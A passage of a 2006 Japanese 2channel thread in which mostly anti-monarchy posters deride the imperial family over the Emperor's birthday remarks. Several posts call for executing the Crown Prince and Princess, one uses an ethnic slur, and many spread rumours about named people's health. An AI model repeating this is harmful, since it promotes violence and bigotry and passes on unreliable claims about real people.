>>256
その認識は間違っていない。
ただし反応は(;;)なんだけど。
早く追い出してよ。おちつかないよ。

258 :可愛い奥様:2006/12/21(木) 18:29:21 ID:ROzq4Xux
>>254
これは仮説だけどあなたが武家信仰だからじゃない?
西欧の騎士や貴族はかっこいいけど、僧侶ってのはなんかださいね、
って思うとか。

259 :可愛い奥様:2006/12/21(木) 21:40:52 ID:bydECyx8
ここってアンチ東宮の別館でしょ?
アンチ東宮の目的って、皇室を潰す事って何処かで読んだ。
それを証拠に雅子さんの悪口の多い事。
皇室そのものが嫌いなスレで、雅子さん叩き。
雅子さんと皇太子さんは皇室の最後の良心だと思うけどね。

260 :可愛い奥様:2006/12/22(金) 00:27:26 ID:yKoCSnDG
>>259
ここは皇族は嫌いだけど雅子だけ大好き!な人が来るところじゃないんだよ。

261 :可愛い奥様:2006/12/22(金) 00:47:32 ID:JJ1V1E7V
>>259
皇太子には良心を認めるけど雅子は邪悪だと思う。
発言を撤回していただきたい。

262 :可愛い奥様:2006/12/22(金) 01:04:18 ID:Tt2UdmKi
なんで皇室なんかがあるんだか・・・。
いい加減取り潰せよ。

263 :可愛い奥様:2006/12/22(金) 01:09:02 ID:WK6Nnb7S
皇族全員失業希望、しばらくは熱烈信者が食べさしてくれるだろうけど
すぐ没落していくだろうね。
キコと鯰が大嫌い。さかりついた犬みたいな結婚みせつけられて気持ちわるくて
たまらなかった。いまでもこの二人見たくない。雅子さんは皇族にならなかったほう
がはるかに幸せだったから気の毒に思う。

>>252
指摘ありがd、人工餓鬼だね。

264 :可愛い奥様:2006/12/22(金) 01:40:06 ID:1RU/LMsV
皇室は宗教法人天皇教にしてもらいたい。
信者が面倒みてくれ。

265 :可愛い奥様:2006/12/22(金) 02:03:04 ID:pjzZtgiD
京都に皇族なんか帰ってこんといてほしいわ。
そんなん願ってるの、中京・上京・下京だけが
京都市やと思ってる年寄りだけやで。
御苑通って近道もできひんようになるし、しょっちゅう
外出されたら警備で車が混んで、狭い道がよけい渋滞
するだけやん。
いろいろ厄介な人が住んでるとこやねんから、余計な
負担させんといてほしいわ。ほんま。

266 :可愛い奥様:2006/12/22(金) 13:39:00 ID:bq1L/887
京都人にすら迷惑がられている天皇ご一家

267 :可愛い奥様:2006/12/22(金) 20:24:29 ID:ge/n7w1E
アメリカ基地なみに迷惑なんだね

268 :可愛い奥様:2006/12/22(金) 20:50:03 ID:WK6Nnb7S
皇族が信者法人なったら一年の200億の税金浮いて少しは弱者のために
なるかな?焼け石に水かな。でもあかんぼから死にかけの老人までひとり200
円の税金で養ってるというからかなりの額だよねる私だったらホームレスから
ウイッシユ買うほうに使いたいな。

269 :可愛い奥様:2006/12/22(金) 21:20:51 ID:UXu8fWPc
皇室はカルトと変わらん。カルトに税金を1円でもつぎ込むべきではない。

270 :可愛い奥様:2006/12/23(土) 02:42:58 ID:E8GNTJM8
>>263
何で雅子さんに同情するの?
結婚は一人では出来ませんよ
雅子さんが自分で決めて入内したのです。
同情してる貴方の税金でレストラン借り切って食事してるのですよ貴方はそういう生活してますか?それでも世間では病気で通っていますね。私は許せません。

271 :可愛い奥様:2006/12/23(土) 06:24:08 ID:4Xz37vRe
私は今日つくづく自分が嫌いなのは今上天皇らしいと改めて気付かせてくれた。
色々あったが昭和天皇は天皇としての威厳があった。
皇太子時代から若い浩宮の方がまだ皇族オーラがあるよなぁと思うほど、影が薄く、
この人が天皇になってもありがたくないなぁとは思っていたし、今でもそう思ってるが。
なんつーか、この人こそ小市民って感じ。
器の小さい頭の悪い男に見えるわ。
雅子さんにいちいち生理きてるか聞いてるって本当だったかもね。
ネチネチやってそう。

272 :可愛い奥様:2006/12/23(土) 13:54:24 ID:CE0btWKK
自分のスキャンダルを失語症という仮病で潰した姑息な皇后、
お子ちゃまみたいな人格否定発言をした皇太子、
海外に逝けないと、ガキみたいにダダをこねた雅子、
兄夫婦の事を非難し、
腹黒くわざとらしく男児を産んだ秋篠宮夫婦、
自分の誕生日に、
わざわざ愛子の件を嫌味ったらしく発言した天皇、

こいつらいつも一族内の揉め事を、
会見で、愚痴愚痴・・・ネチネチネチネチ
こいつらの愚痴なんか、別に聞きたくないっつうの!
裏表ありありなのに偽善者ぶって、施設訪問、災害慰問w
みっともない一家・・何が象徴だよ。
ウザいし、キモいったらありゃしない。
速攻、消えて欲しい。

273 :可愛い奥様:2006/12/23(土) 15:36:33 ID:OKhLCRpL
とても良い写真ですが、できたら見ないで下さい。
http://headlines.yahoo.co.jp/hl?a=20061223-04920272-jijp-soci.view-001

274 :可愛い奥様:2006/12/23(土) 19:05:28 ID:lOLVDxGP
朝日の朝刊しか見てないけれど、
愛子ちゃんについて、「風邪を引くことが多くてなかなか会えない」発言、意味深。あてつけっぽい。
わざわざこんな事、言わなくていいのに。「成長が楽しみです」程度にしときゃいいのに。
天皇、自ら、自分の威厳を下げまくっている。
そして、皇后も(皇后が文章チェックしてるんだから。)

男児を出産したキコについては、絶賛。

イジメの象徴、皇室。
誕生日の文書の一部分だけでも、内部のゴタゴタが臭って来る。
国民に発表する内容に相応しいと思っているんですか? 癌が脳に転移してるんじゃない?
もう、つくづくイヤになった。

275 :可愛い奥様:2006/12/23(土) 19:10:22 ID:vfA62k5y
>>272
スキャンダルって何?
深夜にお手伝いさんにカップヌードル作ってくれませんか、
と頼んだこと?

具体的にきぼんぬ

276 :可愛い奥様:2006/12/23(土) 19:48:52 ID:qMIihVW9
ほーんと税金の無駄遣い
本気で払いたくないわ

皇室が存続することが国民にとってどんな
メリットがあるのかわかるように説明してほしいわ

277 :可愛い奥様:2006/12/23(土) 20:30:48 ID:TJ5d9PrD
>>274
あなたの好きなマサコには褒めるところがないから仕方ないじゃない。
アイコを会わせようともしないんだから。

278 :可愛い奥様:2006/12/23(土) 20:35:48 ID:iTurNKpr
                          r‐r==ヾ 、
        _,___          ,,. --ヘ.ヾ、r、   \ 
      /   __`ヾ),_      / : : : : : \\§§|:|ヽ
     /〃 (⌒゛`ヾv"ヽミ、    / : : : : : : ソ⌒゙ヾ、 ヾ=' ノ
    i / /´ _ニ=-=ニ .i l|   ! : : : : : : ) ⌒   ⌒ヾ:て
    | 彳  〃_.   _ヾ!/   | : : : : :(,  _ )  __ )!:_ノ
    | _ !"  ´゚`冫く´゚`l    ヽ :(aイ  ´゚   i | . ゚`〈
    (^ゝ "  ,r_、_.)、 |     \:_|  " . ノ 、_)、 ゙.ノ 雅子が愛子に会わせてくれないので
     ヽ_j   、 /,.ー=-、i リ      (_ソ人   l ー=‐;! ノ  寂しく思います。
    __/\_ "ヽ  ^ )ソ__        ./\ヽ__,ノ   愛子と打ち解けて話をしたいです。
   |ヽ. |  |` ー--ィ´i |   /⌒l─‐(_/_/‐⌒ヽ
   |   > |、/□、/| < |  ..{  |   \ノ §i ノ


279 :可愛い奥様:2006/12/23(土) 20:36:36 ID:xWt97jVz
嫁いびりだけでなく五歳の孫娘までぶっ叩く鬼ジジ
なーにが「残念ながら」だ。
早く引っ込めセクハラ爺

280 :可愛い奥様:2006/12/23(土) 20:42:41 ID:pLmP6wlh
やっぱあのコメント皆おかしいとオモタのね。キコがなんで愛子と楽しそうに
遊んでだって持ち上げなきゃいかんのよ。やっぱ癌脳転移してるね。
このしじいも消えて保水。

281 :可愛い奥様:2006/12/23(土) 20:44:04 ID:MYD+ITKK
クリスマスの起源は昼が長くなる冬至を記念した日というのが定説です
12月21日〜25日は太陽に感謝してそのシンボル日の丸を掲げましょう
                 ◯                  _____
                 //           ____/       \_________
                // |\_____/                     /
                // │                              /
               // │                             (
               //  │            ,,,,,||||||||||||,,,            )
              //  │         ,,,|||||||||||||||||||||||||          /
              //   │        ,,|||||||||||||||||||||||||||||||||         /
             //   /       |||||||||||||||||||||||||||||||||||||        /
             //   /       ,,|||||||||||||||||||||||||||||||||||"       /
            //   /      ||||||||||||||||||||||||||||||||||||"        │
            //   /       ||||||||||||||||||||||||||||||||"         /
           //  /         ||||||||||||||||||||||||||||"          /
           // /           ""|||||||||||||||||""          (
          //<                        _____\
          //  \__            ______/         ̄
         //       \________/
   ∧_∧ //  
  ( ´∀`)// <小顔の奥さま方、メリーサンシャイン!
  (    つ   
  | | |
  (__)_)


282 :可愛い奥様:2006/12/24(日) 00:09:29 ID:EYJoXbBL
>>278
気持ちが悪い顔をさらすのを、いい加減にやめて頂戴。
左の方は肝臓も悪いのか?右の老婆のヒステリーは、いまだに治っていないようだな。


283 :可愛い奥様:2006/12/24(日) 00:46:21 ID:GB2cUJCs
いっちゃ悪いけど今の天皇って顔にしまりがない。
苦労知らずの顔
誕生日なんて自分らの金で出して欲しい
格差社会の代表格だし


284 :可愛い奥様:2006/12/24(日) 01:00:08 ID:RT2DuRm/
黒田清子さんの披露宴の時、雅子妃と目があった天皇の顔は
ひきつっていた。その後も会話するする訳でもなく
冷えきってるんだろな、とオモタよ。

285 :可愛い奥様:2006/12/24(日) 01:14:43 ID:5lNdVvkl
>>284
平価は自分とこの子供も含めて全員雅子の家系の頭脳には劣ることわかっているんだよ。
でも自分は天皇、日本国の王様で一番えらいんだという頭があるから雅子が煙たいんだよ。

286 :可愛い奥様:2006/12/24(日) 01:40:12 ID:p8+3GdXi
雅子もそう頭がいいとは思えないけど・・。(アンチ皇室ですが。)

それより、雅子もしっかりせいって感じだなあ。医師とか味方もあるんだろう?
夫はどうなの。味方なんでしょ?

287 :可愛い奥様:2006/12/24(日) 01:56:30 ID:5lNdVvkl
確かに雅子さんもせっかく皇族になったんだからもっと別の開き直り方して
次の皇后は私だよ文句あっか!つまらんことすべてぶった切ってどんどん自分流
の皇室にしてやるってくらいふてぶてしくなりゃいいんだよ。

キコだって3DKのあばずれ女なんだから人工餓鬼作ったって自分たちの後の即位
だから取りあえずはへなへなしてないでキコの心臓見習うことだね。
でもほんとは皇族なんかいらね。キコが一番むかつく。ただのヤラセ女あがりだもの。

288 :可愛い奥様:2006/12/24(日) 01:59:06 ID:c3+YKuFt
このスレッドタイトル凄すぎ。みんな、同じこと考えてんのね。

289 :可愛い奥様:2006/12/24(日) 02:00:25 ID:csspj1Jo
>>287
なんか凄い下層社会の臭いのするレス。


290 :可愛い奥様:2006/12/24(日) 02:04:22 ID:5lNdVvkl
>>289
へえお宅様の上流社会の臭いするレス期待してみてます。
どう思われようとかまいませんが一応資産だけは数億ありますが。。。

291 :可愛い奥様:2006/12/24(日) 02:12:09 ID:csspj1Jo
>>290
いえいえ、私などは「いわゆる中流」ですけど
なんか昭和の息吹を感じたりしたのでw
こういう生粋のアンチ皇室が雅子さんを応援
してると思うと感慨深いです。


292 :可愛い奥様:2006/12/24(日) 02:26:28 ID:p8+3GdXi
応援などしてないが(そもそも嫁に行った段階で無理ポだったし、あちら側の女)、
詳しいことはしらないけれどももっと度胸もったらいいのにとおもただけ。

まあ、宮中なんてのほ陰険ないじわるのあるところであって世間の常識は通用しないらしいし
たいへんなのは想像できるけどさ。

女一匹そんなところへ覚悟で嫁に入ったならもそっとしっかりせいとおもっただけ。

293 :可愛い奥様:2006/12/24(日) 02:45:27 ID:OMycqtGn
なんていうか海外の皇室の人らと比べて生命力というか活力が
感じられないのが致命的。あと頭の回転弱そう。
あちらの皇室や王族の人たちって明日からあんた達平民だよぉ〜って
言われたら、あ、そうですかってちゃんと逞しく自分達で生きていけそう
だけど、日本の天皇一家は生きてけなさそうな駄目オーラに満ちてる。

294 :可愛い奥様:2006/12/24(日) 04:53:37 ID:Qvv0k8bg
もう本当に絶滅危惧種って感じ。
種自体が衰えてるね。


295 :可愛い奥様:2006/12/24(日) 05:49:42 ID:wj7UoPPu
そう思って舐められてるんだろうな。
獣としての強さを見せ付けるためにも東宮の処刑を期待したいよ。

296 :可愛い奥様:2006/12/24(日) 06:00:19 ID:6wi9G/b3
東宮処刑きぼんぬ。役人もそろそろ動き出せよ。
あと東宮を擁護したクソライターも永久パージ!

297 :可愛い奥様:2006/12/24(日) 06:05:38 ID:csspj1Jo
公明党が与党だというこの国の恐ろしさ。


298 :可愛い奥様:2006/12/24(日) 06:49:40 ID:edIExkOw
処刑するならまずは雅子から。

299 :可愛い奥様:2006/12/24(日) 07:39:26 ID:IyEoVisn
日本人て、家柄のよさとルックスのよさの相関関係度が限りなくゼロに近いよね。
インド人なんか、相関関係度90%近くあるのに。
天皇御一家は、チビで貧相なお顔立ちの方が多い。
このご面相で国の象徴だなんて、これじゃ税金泥棒だよw

300 :可愛い奥様:2006/12/24(日) 07:45:21 ID:+k+F3lE9
その相関の無さこそが日本の良さなんだけどな。
餅は餅屋。ルックスはそれで食べる人が身につけてればいい物。

301 :可愛い奥様:2006/12/24(日) 07:48:22 ID:yw1mcGKp
処刑なんかしなくていい。
誰も死んで欲しくない。


302 :可愛い奥様:2006/12/24(日) 09:56:24 ID:Kyc1/DZV
皇太子妃ショ刑はアンチ皇室でさんざん見て飽きた。

303 :可愛い奥様:2006/12/24(日) 11:57:12 ID:miGEuE5+
処刑なんてすごい言葉が出てくるのかこのあたりは・・。

アンチ天皇制だがいきなり処刑とは・・。おぞましい。
天皇制が犯してきた罪を認めて、廃止してくれればそれでよい。残虐はみたくない。

で、なんで雅子が処刑されるの?理解不能だ。

304 :可愛い奥様:2006/12/24(日) 13:31:06 ID:/lyXlTXZ
嫌な奴らはとっとと日本から出て行け!
おまえら本当に日本人なのか?

305 :可愛い奥様:2006/12/24(日) 14:12:28 ID:Kyc1/DZV
東宮廃止だの流産祈願だの、池沼だの言ってるやつらを
処ケイしてください。

306 :可愛い奥様:2006/12/24(日) 14:25:20 ID:IyEoVisn
それと、顔立ちが貧相なのは生まれつきでどうしようもないとしても、
みんな、それぞれ独特の微笑み方をなさるのだけど、薄気味悪いんだよね。
上流の上の生活をしなれている割には、上品さがちっとも醸し出てないし。
やっぱり、醜男、醜女じゃどうしようもないかw

307 :可愛い奥様:2006/12/24(日) 14:38:36 ID:P5PFpRqX
確かに侍従長とかの人のほうが
圧倒的に上品+教養+鷹揚なんかがにじみ出てるね。
この前なくなった侍従長とかいう方もすっごい上品なじいちゃんだと思った。

308 :可愛い奥様:2006/12/24(日) 16:01:44 ID:9kavs6sc
>>304
日本から出て行け言う前にこのスレに来ないでください。
天皇制おしつけられてもね〜北朝鮮へお行きになったらどうですか?
毎日マンセーって言い続けられますよ。

309 :可愛い奥様:2006/12/24(日) 20:05:12 ID:omWyOXCs
美智子が最初だけど、皇室のように血がヘドロのようにドロドロに汚れたところへ
よくもまぁ嫁に行く物好きも居る罠。
生活には苦労しないが、一番大事なのは遺伝的に立派な子を産むことだものね。
素人でも遺伝のことを少しでも知っていれば、怖くて皇室なんかに嫁がないってぇ。
どんな子供が出来ても自分が選んだ道だから自業自得だわ。
最初から分かっていたことなのに、それを悩んで精神病になるなんて、鬼でも笑うわね。

鯰は美智子の家系にソックリだけど、天皇家には似ていないわね、良かったねw


310 :可愛い奥様:2006/12/24(日) 23:02:15 ID:VQA+Cld7
処刑が残酷なら、せめて役に立たない皇族は追放しろ!先ずは東宮妃から。

311 :可愛い奥様:2006/12/24(日) 23:19:07 ID:xgcHweML
やっぱりアンチの正体は、天皇家を潰す事なのね。
本当に汚い連中だわ。
何で雅子さんから処刑だの追放だのされるのよ。
一番の責任者は両陛下でしょうに。

312 :可愛い奥様:2006/12/25(月) 00:16:36 ID:I2EhB6Ho
皇族全員大嫌いだけど雅子だけ好き。唯一反抗して病気なってるとこ人間らしい。
雅子処刑反対。もっと皇室の醜さ見せ付けて誰も嫁がないようにしてつぶしてくれてもいい。

313 :(・Д・)y―┛~~:2006/12/25(月) 00:33:38 ID:x+YAsSdN
チョンどもがさわいどるな

314 :可愛い奥様:2006/12/25(月) 00:35:48 ID:RmUh5qp+
>>5
そのおかげで森が残ってるんだよね。
天皇陵などがなかったらとっくにパチンコなんかの
きったない景観になってるさ。

315 :可愛い奥様:2006/12/25(月) 02:23:24 ID:cW252P5P
公安調査庁 北朝鮮に警戒を
http://www3.nhk.or.jp/news/2006/12/23/k20061223000008.html
12月23日 5時49分

公安調査庁が国内外の治安情勢をまとめた「内外情勢の回顧と展望」によりますと、
北朝鮮は、安倍政権の拉致問題や核実験への対応に強く反発しているとして、
今後、日本に対して有害な活動に走る可能性も含め、動向には警戒が必要だと指摘しています。

暴力団の活動は多様化・巧妙化 フロント企業を使用
賭博や覚せい剤に頼らない芸能興行などが新たな資金源として確立されている
http://i138.photobucket.com/albums/q270/newscap/cap2/yakuza02.jpg

「日本を知るには裏社会を知る必要がある」 元公安調査庁の菅沼氏が講演
http://p2.chbox.jp/read.php?host=news18.2ch.net&bbs=mnewsplus&key=1166711995&ls=26

316 :可愛い奥様:2006/12/25(月) 02:27:03 ID:KN8iw8G9
皇道派だけど、お堀の中をマンハッタンのようにしたら面白いと
ふと思った。

317 :可愛い奥様:2006/12/25(月) 02:44:12 ID:8ci7WoWV
皇太子は雅子さんと愛子さん連れてお堀の外に出る。
残った天皇家の奴らは、跡取りと病気の嫁とその子をを追い出した極悪人として、
世界中から凄まじいバッシングを受けて欲しい。
孫差別するようなジジイを飼ってる必要ない。
万系一世だって、いい年したおっさんどもが何世迷いごとを言ってるんだって感じ。
天皇誕生日だけ祝日で残してくれればw、皇室なんてどうでもいいわ。

318 :(・Д・)y―┛~~:2006/12/25(月) 02:51:26 ID:x+YAsSdN
>316
皇道派は2・26事件の裁判で全員、銃殺されてますが w

319 :可愛い奥様:2006/12/25(月) 10:49:19 ID:HWThZSl3
>>317
でも、現実問題東宮のがバッシングされ気味なんだよねぇ。
私は、雅子さんのおかげで皇族があまり・・・
その子供の顔も好きじゃないし。
水俣の原因の企業の嫁を貰うなんて嫌われる一因だよ。

320 :可愛い奥様:2006/12/25(月) 11:00:39 ID:8ci7WoWV
>>319
東宮といわずできれば全員出て行って欲しいけどね。

321 :可愛い奥様:2006/12/25(月) 15:00:45 ID:t2n3eTZB
高齢者は年金問題、子どもはイジメ自殺、貧しい層も増えているらしいのに
天皇は孫が打ち解けないだの眠れないだの、「それがどうした?」って感じだわ。

322 :可愛い奥様:2006/12/25(月) 16:04:38 ID:4kTwuE78
天皇が眠れないのは、抗ガン剤の影響ではないのか?
顔色がドス黒いし、浮腫んでいる。
それと自身の余命を悟ったのだよ。


323 :可愛い奥様:2006/12/25(月) 16:15:51 ID:BUSZ1YtE
人ンちの爺の心配するほど暇じゃないってこった。
アーしょうもない爺
男の癖に可哀想ブリッコかよ

324 :可愛い奥様:2006/12/25(月) 18:56:57 ID:KW0E7c4Q
天皇ってフレンチブルドックに似てる

325 :可愛い奥様:2006/12/25(月) 19:53:56 ID:X5LMNCa4
雅子一族は、欲に目が眩んで、
とんだ貧乏クジをひいたものだw
婚約した時が、雅子一族の最高にいい時だったんだろうね。
今じゃ何をやっても、裏目に出て、
まるでボロ雑巾w
次男に嫁いだ紀子は、おいしいとこ取りだけどw



326 :可愛い奥様:2006/12/25(月) 23:13:52 ID:I2EhB6Ho
雅子は皇太子に熱望されすぎて断り切れなかったところが悲劇だね。なんとしてでも
断らなければいけなかった。ナルもコンプレックスの塊だから雅子の頭脳にあこがれたんだ
ろうね。結婚式なんて小和田家は葬式みたいに泣いてたけど実際そうなってしまったわけだ。
皇族なんてキコみたいなあばずれが「わ〜いプリンセスになった」って子宮武器にのしあが
っていくところで碌でもない血統に成り下がってくよ。
でこんなもの早く廃止しろ。何がありがたいんだか?バカか?

327 :可愛い奥様:2006/12/25(月) 23:16:36 ID:+bjnJwsU
>葬式みたいに泣いてたけど

めちゃくちゃ非常識。

最初から(いざというときのため?)
皇太子を悪者に仕立てる意図

328 :可愛い奥様:2006/12/25(月) 23:18:51 ID:UC30S9Jm
自分の息子夫婦とさえ上手くやっていけない
人に国民の代表面されてもなぁ・・・とオモ田。


329 :可愛い奥様:2006/12/25(月) 23:20:57 ID:+bjnJwsU
とにかく他人を悪者に、悪者に、と考える人たちなので
実はその元凶をこそやった方がいいのですよね。
ようやくいい流れが出てきたなという感じです。、

330 :可愛い奥様:2006/12/25(月) 23:32:04 ID:8ci7WoWV
雅子さんが公務しないでひきこもり云々より、孫差別をするジジババが気に入らん。
嫁がいくら嫌いでも、孫は関係ないだろ孫は。公共の電波使って孫いびりすんな。あーむかつく。
ジジババさっさと消えうせろ。マスコミ使ってキモイ顔晒すな!

331 :可愛い奥様:2006/12/25(月) 23:34:10 ID:I2EhB6Ho
でも鯰天皇キコ交合だけは見たくない。吐き気する。キコの産んだ子が天皇に
なるのもけがわらしい。なんせ全員廃業して派遣で労働しろ!
何の役にもたちそうもないのに様づけされてほんといい迷惑だよ。。。


332 :可愛い奥様:2006/12/26(火) 00:00:33 ID:fn+N46v6
今年は子供のいじめや自殺,虐待など悲しい事件に多く接した年でした。子供を失った親の気持ち,いじめにあった子供の気持ちを察すると誠に心が痛みます。
>愛子ちゃんが物心ついた時に爺が言った言葉に心を痛めるだろうね、きっと一生の心の傷になることでしょう
 良かったね、浅はか爺さん
 
このようなことをできうる限り防ぐために,親,子,先生が互いに信頼し合う関係を築いていくことが大切であり,子供たちが自分の立場と共に他人の立場にも立って,
物事を考える習慣を身につけて育つように,親や先生が助けていくことが重要と思います。
近年,生徒が高齢者や障害者との交流やボランティア活動に取り組み,様々な立場の人々に対する理解を深める機会を作っている学校が多くなっていることは心強いことです。
私はこういう面に今日の教育の明るい兆しを感じています

>で自分は孫の立場 長男夫婦の立場は配慮出来なかったんだw
 そういう習慣が身に付かなかったんだね73にもなってw
 だから笑いながら5才の子叩きの餌をばら撒いたわけだw
 さぞや皇室の未来は明るい?だろうね・・・


333 :可愛い奥様:2006/12/26(火) 00:04:45 ID:K795/fGK
国の象徴たる天皇の言葉が5才の孫たたきじゃねえ。
恥を忘れた耄碌爺か癌が脳転移か?

賢い交合と考えた文章があれではね。

334 :可愛い奥様:2006/12/26(火) 00:25:26 ID:J8UFzCNT
ただの意地悪舅みたいな発言をあんな場でするなんてびっくりした。
無口なだけで実は意地悪極まりない人なのか。

335 :可愛い奥様:2006/12/26(火) 00:27:32 ID:fn+N46v6
いくら耄碌爺と言えども人としての「根底」に愛情と配慮があればあ〜言う発言はしないでしょ。
結局 要らない子 どうでも良い子 が先行してるから言わしめる。
やれ慈愛だ祈りだと大仰に騒ぎ立てても自分が苛めの率先やってりゃ世話無いわw

336 :可愛い奥様:2006/12/26(火) 00:38:18 ID:h6hu29OM
長幼の序を旨とする皇室にありながら天皇陛下は長幼の序を区別しないし、
長男の皇太子様はやさしすぎるし、次男の秋篠宮様は陰謀企てる悪魔のよう。
そしてやさしすぎる旦那さんを持つが故に苦しんでしまい公務をサボり気味に
なってしまった皇太子妃。そして陰謀を裏で操作している弟宮妃。
もう、本当汚い家庭の図式を見ているようだ。
後、天皇陛下の学歴とかそういう経歴コンプレックスのせいで弟宮妃の方が
自分よりも下の為に重用するという身勝手さも嫌い。その弟宮とその妃がそれに
便乗しているのも嫌い。それに対して強く意見を言えない皇太子様も不甲斐ない。
不甲斐ない皇太子様におんぶに抱っこの皇太子妃もだらしない。

337 :可愛い奥様:2006/12/26(火) 00:43:18 ID:K795/fGK
よって皇族のみなさ〜ん廃業ですよ。後は支持者に食わせてもらってくださいよ。

338 :可愛い奥様:2006/12/26(火) 00:54:33 ID:ukpubdk6
爺、ボケたのか?癌が脳に転移したのか?
言い忘れがあってはいけないからと、原稿見ながらの会見の結果が、
気に入らない長男嫁への嫌味と5歳の孫への差別発言かよ。バカじゃねーの。
嫁はともかく、5歳の孫が打ち解けないとマスコミに向かってぼやく73歳児なんて
いまだかつて見たことないわ。

こんな爺、税金使っていいもの食わせる必要なし。200円でも惜しいわ。
3DK嫁が可愛くて仕方ないみたいだから、爺婆もそのへんの3DKに住んどけや。



339 :可愛い奥様:2006/12/26(火) 01:00:46 ID:fn+N46v6
この際耄碌爺婆と秋篠一家は川島家のしょぼいマンションへ
東宮一家は小和田家へお引取り願ってもいいかもw

340 :可愛い奥様:2006/12/26(火) 01:07:12 ID:ukpubdk6
ちょうど嫁さん実家の二世帯住宅の片方が空いてるし、いいかも>皇太子
爺婆鯰3DK嫁ご一家は、3DK嫁実家の中古マンションの同じ部屋で仲良く暮らせや。
その他の皇族は適当にどっかに移り住め。これですっきりさっぱり。

341 :可愛い奥様:2006/12/26(火) 01:15:01 ID:w/aOvY5F
長男夫婦のグチを公に言いたい衝動に駆られるのなら
別に止めないけれど、どうせなら皇后のキモイ美辞麗句
もいい加減に辞めさせて欲しい。全く整合性がない。

342 :可愛い奥様:2006/12/26(火) 01:28:51 ID:K795/fGK
ここの皆さん好き〜最初は延びなくて?って思ったけど進んできてうれしいw
生まれたてのキコのあかんぼに大の大人がひさひと様って呼んでるの嫌悪感抱く。


343 :可愛い奥様:2006/12/26(火) 02:02:31 ID:S/7BA9Lh
>>326
雅子だって、家族ぐるみで
熱望して皇族入りしたんじゃん。
そのうれし涙でしょうが。

皇族潰しする目的なら着々進行中?

344 :可愛い奥様:2006/12/26(火) 02:04:32 ID:06hpcXFT
>>342
愛子「様」も、当然嫌悪感だな。

345 :可愛い奥様:2006/12/26(火) 05:08:10 ID:qFYDuCqI
愛子様、雅子様だけでいいよ〜あとはいらな〜い!

346 :可愛い奥様:2006/12/26(火) 05:13:54 ID:pG4xpRRd
>>345
わかりやすいね。

347 :可愛い奥様:2006/12/26(火) 09:28:00 ID:3SBkaIIj
好きとか嫌いとかの対象にする人達はどこの国の人なの?
もう少し日本の文化や歴史の勉強したほうがいいですよ。

348 :可愛い奥様:2006/12/26(火) 09:31:48 ID:PBxoHHrg
じゃあ、あなたが養えば?
税金の無駄

349 :可愛い奥様:2006/12/26(火) 10:10:56 ID:TGL/S2oU
348に激しく同意。
今この国の財政状況は私利私欲だらけの政治家のせいで
1円の余裕もない危機的状況なんだから。
皇族の人には先陣きって身をコナにして国のために働いていただきたい。

350 :可愛い奥様:2006/12/26(火) 10:21:11 ID:FlntSgD3
>349みたいな馬鹿が多いから政治屋が好き勝手できるんだよなぁ

351 :可愛い奥様:2006/12/26(火) 10:45:02 ID:TGL/S2oU
下っ端乙 自給いくら?>350

352 :可愛い奥様:2006/12/26(火) 10:49:59 ID:ukpubdk6
皇室の歴史なんてどうでもいいわ。先祖があって今の自分があるのは平民も皇族も一緒。
孫のえこひいきする爺婆を見たくないだけ。
原稿読んであの陳腐な会見かよ。もう痴呆がはじまってるんだろうから、すっこんでろ。
マスコミもいいかげん皇室取材は自粛しろ。
公共の電波を使って、一家の揉め事を見せられるのは不愉快でしかないわ。


353 :可愛い奥様:2006/12/26(火) 10:52:53 ID:rVMJqixo
>>349
だったら政治家とそれを選んだ奴が責任とるのが筋じゃない?
皇族関係ないじゃん。
民主主義ってそうゆう事だろ?

354 :可愛い奥様:2006/12/26(火) 11:05:12 ID:e7RuQi1n
>>353
こんな馬鹿共に何言っても無駄。
自分の損得考える脳みそくらいしか持ってないんだから。
たぶん給食費やNHKの受信料払わない連中と一緒。

355 :可愛い奥様:2006/12/26(火) 11:08:13 ID:JpUqc3DF
>353
民主主義いい??人間に貴賎があるこの国で、民主主義いいい?この国が民主主義だなんてことはない!絶対!来た朝鮮のソフト版だ

356 :可愛い奥様:2006/12/26(火) 11:12:46 ID:PBxoHHrg
354
あんたみたいな熱烈信者が払ってやったら?
つくってもらった原稿なんかよまないで自分の意見いえないのかね。なさけないよ

357 :可愛い奥様:2006/12/26(火) 11:15:50 ID:42e5e5FW
好きとか嫌いとかじゃなく、今や不必要なものだと思う。
で、なくなってもいいんだけど、変な人たちに利用されないようなんらかの
規制はしてほしい。
皇室マンセーの人たちに担がれて、選挙に出て首相になるなんて最悪だもん。


358 :可愛い奥様:2006/12/26(火) 11:19:30 ID:3QVg3Yc+
>>354
アンカーのつけ方も知ろうともしないバカに何を言ってもムダ
みたいですね。

359 :可愛い奥様:2006/12/26(火) 11:23:21 ID:PBxoHHrg
あのさぁ、ここはマンセースレじゃないんだけど。

360 :可愛い奥様:2006/12/26(火) 11:23:37 ID:D1kFsHkc
>>357
世界中が羨む我が国が誇れる文化を不必要とは
全く呆れた人だねぇ。

361 :可愛い奥様:2006/12/26(火) 11:24:57 ID:ukpubdk6
ただのツンデレなんじゃないの?>このスレの皇室信者
実質は皇室潰しの工作員なんだと思うよ。
工作活動が上手くいって、日本人の皇室離れが進んで内心しめしめ、
このスレの皆さんありがとう〜ってとこでしょ。

本当に好きなら敬愛スレでも行けばいいんだし。
こんな皇族嫌いが集まるスレで住人に対して毒吐いたって、余計に反感買うだけじゃん。
まあ、それが本当の目的なんだと思ってるけどね>反感買うだけ


362 :可愛い奥様:2006/12/26(火) 12:38:07 ID:TGL/S2oU
>>361 そっか。燃料投下ありがとう、だねw
皇室はいらないと思ってるけど
別に皇室の人を個人的に好きとかキライとかはない。
ただ国のためを思うなら先陣きって
「痛みを分かち合って」ほしい。

363 :可愛い奥様:2006/12/26(火) 12:56:12 ID:GHvcW1ka
雅子の病気は絶対に治らないからな。
これ以上贅沢三昧の生活をさせてはいけない。

皇室にそれだけ金が余っているのなら、皇室の私財でもなんでも老人施設や
愛子と同じような障碍児施設に寄付をするのが筋だろうな。
美智子が、皇室は祈りだというのならな。


364 :可愛い奥様:2006/12/26(火) 13:42:41 ID:FhVROpBV
痛みを分かち合うために、owdが邪魔なんだよね。
だから追い出します、そういうことでしょ。
そう考えたら、まともにやろうと思ってるとは思いますけど?

90 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)